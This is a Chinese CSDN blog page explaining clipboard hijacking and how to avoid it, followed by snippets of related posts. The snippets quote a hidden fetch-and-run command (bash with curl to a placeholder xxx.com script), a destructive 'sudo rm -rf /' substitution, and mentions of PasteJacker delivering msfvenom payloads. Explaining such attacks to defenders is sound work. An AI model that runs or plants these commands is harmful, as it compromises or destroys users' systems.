什么是剪贴板劫持-剪贴板劫持教程

已于 2023-07-22 19:44:52 修改
阅读量3.9k 收藏 4
点赞数 2
文章标签: web安全
于 2023-07-21 20:18:44 首次发布
Neatsuki-king
本文链接:https://blog.csdn.net/m0_54471074/article/details/131858980
版权
剪贴板劫持是一种通过控制受害者剪贴板植入恶意代码的攻击方式。避免这种攻击的方法包括不直接从网站复制命令,使用文本编辑器检查复制内容,开启剪贴板通知,以及使用密码管理器。PasteJacker是一种工具,演示了如何执行剪贴板劫持,但应谨慎使用,以免造成损害。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

前言

我来写剪贴板劫持教程。

什么是剪贴板劫持

剪贴板劫持是一种危险的攻击技术,借助该攻击者可以控制受害者的剪贴板并将恶意代码粘贴到目标机器中,然后攻击者控制受害者的机器。
剪贴板劫持或剪贴板劫持是恶意网站用来控制受害者计算机上的剪贴板并在受害者不知情的情况下将该内容更改为恶意内容的方法。剪贴板劫持是一种漏洞利用,其中一个人的剪贴板的内容被恶意行取代,例如指向恶意 Web 服务器的链接、恶意代码或命令。

  • 示例:用户上网,他得到了一些有用的命令。该命令由用户复制,但如果它是剪贴板劫持,则用户不会复制看起来正常的有用命令。用户甚至不知道他复制了一些恶意命令来代替看起来正常的有用命令。当他在Linux终端或Windows电源外壳中粘贴并运行命令时,他的机器将受到损害。

如何避免剪贴板劫持?

避免这种攻击非常容易。我们不应该将命令从网站直接复制并粘贴到终端。最好键入所需的命令。
如果我们必须从网站复制命令,我们可以复制它,但在将其粘贴到终端之前,我们应该将其粘贴到记事本、鼠标垫、叶垫等文本编辑器上。如果是剪贴板劫持,那么在文本编辑器中将向我们显示我们粘贴了什么命令。终端也可以向我们显示,但出于安全原因,我们不应该在终端上尝试。

这是防止剪贴板劫持攻击的过程:

  • 我们不应该从网站复制命令,最好自己输入
  • 对于很长的命令,在粘贴到终端或 powershell 上之前,我们通过将其粘贴到文本编辑器上来检查命令。
  • 打开剪贴板通知:某些操作系统允许我们 打开剪贴板通知,每次都会通知我们 某些内容被复制到我们的剪
最低0.47元/天 解锁文章
C# 使用WinApi操作剪切板Clipboard
balian7158的博客
05-31 1156
前言: 最近正好写一个程序,需要操作剪切板 功能很简单,只需要从剪切板内读取字符串,然后清空剪切板,然后再把字符串导入剪切板 我想当然的使用我最拿手的C#来完成这项工作,原因无他,因为.Net框架封装了能实现这种功能的方法 然后就有了如下代码 1 string Temp = ""; 2 while (true) ...
kali linux 通过粘贴板攻击对方服务器
QQ670663的博客
02-20 2341
模拟剪贴板劫持对目标进行攻击。简而言之,粘贴劫持是恶意网站用来控制您计算机的剪贴板并在您不知情的情况下将其内容更改为有害内容的一种方法。所以在这里所做的是自动化原始攻击并添加另外两个技巧来欺骗用户,使用 HTML 和 CSS将讨论它然后添加 meterpreter 会话。
剪切板劫持种类
Cocoprince的博客
03-10 3463
比特币钱包界面如下: 对方钱包地址 自己的密钥 转账数量 剪切板劫持其实有三种情况: 1.填入对方地址时,木马病毒把地址换成黑客的钱包地址。 2.复制粘贴自己的密钥时,被木马病毒盗走,导致密钥泄露。 3.木马病毒更改转账数量。 剪切板劫持可以和钓鱼网站结合起来,木马病毒把目标网站改成钓鱼网站! ...
DOM中剪贴板控制与剪贴板劫持攻击提醒
weixin_33897722的博客
05-25 546
本部分系列文章Github Repo Introduction Clipboard API HTML5实战与剖析之剪贴板事件 IE是最早支持与剪贴板相关的事件,以及通过JavaScript访问剪贴板数据的浏览器。 IE的实现成为了事实上的标准,随后Firefox 3+ 、 Chrome和Safari 2+都支持类似的事件和剪贴板的访问,...
网页复制的剪切板攻击
Tesi1a的充电桩
11-07 1722
0x00 攻击场景 在网页里copy 一段shell 代码 比如: pip install frida 实际执行: bash <(curl -s -S -L http://xxx.com/xxx.sh),而且还TM的自动回车执行了。。。 0x01 实现原理: 在网页里使用js代码,改变复制的内容 <html&amp
KaliLinux-剪切板攻击-PasteJacker工具的安装
weixin_44257023的博客
03-19 3139
在kali中安装 pastejacker 和 pip 下载安装 pip 下载 pip wget https://bootstrap.pypa.io/get-pip.py pastejacker 我安装的时候用的是 python3 安装的所有它会在 python3.9 文件夹下 /usr/local/lib/python3.9/dist-packages/PasteJacker/Core 这个目录下有一个 vim updater.py ...
剪贴板劫持--PasteJacker的使用
Welcome To Myon'Blog !
11-10 551
它这里还存在一个换行符也就是回车,也就是说你将这个命令复制进终端,只要粘贴上去它就会自动执行,不需要你手动敲回车。接下来我们需要选择一个用于剪贴板劫持的模板,有3种类型,我们先选择2即javascript进行测试。第一个选项将创建一个隐藏的 bash 命令,在受害者系统中执行我们的 msfvenom 有效负载。第一次是让我们选择要攻击针对的目标系统,这里以Windows系统为例,即我自己的物理机。这个才是实际的内容,这里只是以test为例演示,实际攻击中一般是一些恶意代码或者命令。因此键入 1 ,回车。
自定义剪贴板数据类型在API中的应用详解
由于剪贴板操作涉及数据传输,因此可能受到恶意软件攻击,例如剪贴板劫持。因此,开发者在实现自定义剪贴板功能时,应确保数据的安全性,例如,对敏感数据进行加密存储。 9. 跨平台剪贴板操作 不同操作系统的剪贴板...
用python做一个剪切板助手
12-21
【Python剪切板助手开发详解】 在日常工作中,频繁的复制粘贴操作可能会降低工作效率,尤其是在需要处理大量数据或文本时。为了解决这一问题,我们可以利用Python编写一个剪切板助手,它能实时监测剪切板内容的变化...
新浏览器扩展Copy Guard-crx:复制保护与劫持警告
- **文本选择与剪贴板数据比较**:每当用户触发复制事件时,插件会自动将用户在网页上选择的文本内容与剪贴板中的数据进行对比。 - **差异警告通知**:如果用户选择的文本内容与剪贴板中的内容存在差异,则插件会向...
浏览器劫持源码
08-06
浏览器劫持源码 浏览器劫持.e
js clipboard 复制文字到剪切板功能
12-02
复制文字到剪切板功能,兼容各种浏览器,非常实用
剪贴板劫持“攻击:黑客利用虚假验证码通过入侵网站窃取数据
最新发布
FreeBuf_的博客
04-08 344
黑客利用虚假验证码劫持剪贴板,窃取数据并植入恶意软件!
js 劫持粘贴板
高先生的猫
05-31 627
export const copyTextToClipboard = (value) => { var textArea = document.createElement("textarea"); textArea.style.background = 'transparent'; textArea.value = value; document.body.appendChild(textArea); textArea.select(); try { .
奇技淫巧之粘贴板攻击
sievr的博客
03-25 729
粘贴板攻击,顾名思义,通过粘贴板攻击目标。(可搭配xss使用) 相信大家在某大型博客上复制东西,奇复制的内容后都会加上下面这串字符吧 ———————————————— 版权声明:本文为博主的原创文章,遵循****版权协议,转载请附上原文出处链接及本声明。 其原理就是通过js实现 而今天,我们要做的就是,自定义这一段内容,你可以给他改成任何你想要的命令或者代码。 比如,你从某搜索引擎上搜到的答案是 ping google.com,一条人畜无害的命令,结果粘贴出来的却是sudo rm -rf /,你看都没看就
剪贴板劫持--PasteJacker的安装
Welcome To Myon'Blog !
11-10 467
如果遇到报错,在结尾追加 --break-system-packages。按i进入编辑模式,将try的部分注释掉,并缩进return语句。找出来的结果有点多,我们直接找文件 updater.py(从 GitHub 库克隆PasteJacker。后面会继续介绍PasteJacker的基本用法。先找一下文件夹dist-packages。尝试运行pastejacker。安装PasteJacker。修改updater.py。ESC,wq保存退出。
Pastejacking - CTRL+V粘贴劫持攻击
weixin_33979745的博客
07-03 580
安全研究人员可以使用CSS附加恶意内容至剪贴板,而不必通知用户,最终诱骗他们执行不需要的终端命令。此类攻击就是众所周知的剪贴板劫持。在大多数情况下,它是无效的,除非用户在终端内复制内容。安全研究人员Dylan Ayrey上周发布了剪贴板劫持的最新版本,该攻击是将Java作为攻击媒介,而非CSS。 这种攻击被称之为粘贴劫持,他的概念验证攻击原理与旧版CSS...
点击劫持、Self-XSS、复制粘贴劫持的组合攻击学习——XSS劫持
weixin_50464560的博客
08-10 1397
点击劫持 这一篇总结得很清楚也很通俗易懂(手动滑稽) https://blog.csdn.net/weixin_50464560/article/details/119562912 Self-XSS 一些网站为了用户体验着想会有这么一个功能,就是用户在提交信息失败并且需要返回去填的时候会帮你自动把之前填写的信息补全回来,这样就避免了用户的重新输入,节省了用户的时间。这是一个很好很人性化的功能,但是这种补全可能不那么被重视,所以很多网站也不会对输出进行过滤,这样就可能存在XS...
点击劫持漏洞原理和复现
weixin_54438700的博客
05-20 5208
一、漏洞原理 点击劫持(Clickbandit),主要是利用HTML中iframe便签可以透明的属性进行利用攻击,其原理是通过在原本的网页上覆盖透明的框架并使受害者在不知情的情况下进行点击。漏洞主要是由于未对referer字段来源进行检验。常常配合csrf和xss。 图中,攻击者在原本网站上覆盖一个透明框架,受害者正常访问网站A,就会点击到这个透明框架B。攻击者常常利用该漏洞诱导受害者点击关键位置进行一些操作,比如转账、购买等危险操作。 二、漏洞复现 1.借助burpsuite工具,选择Clickb
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

「已注销」

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值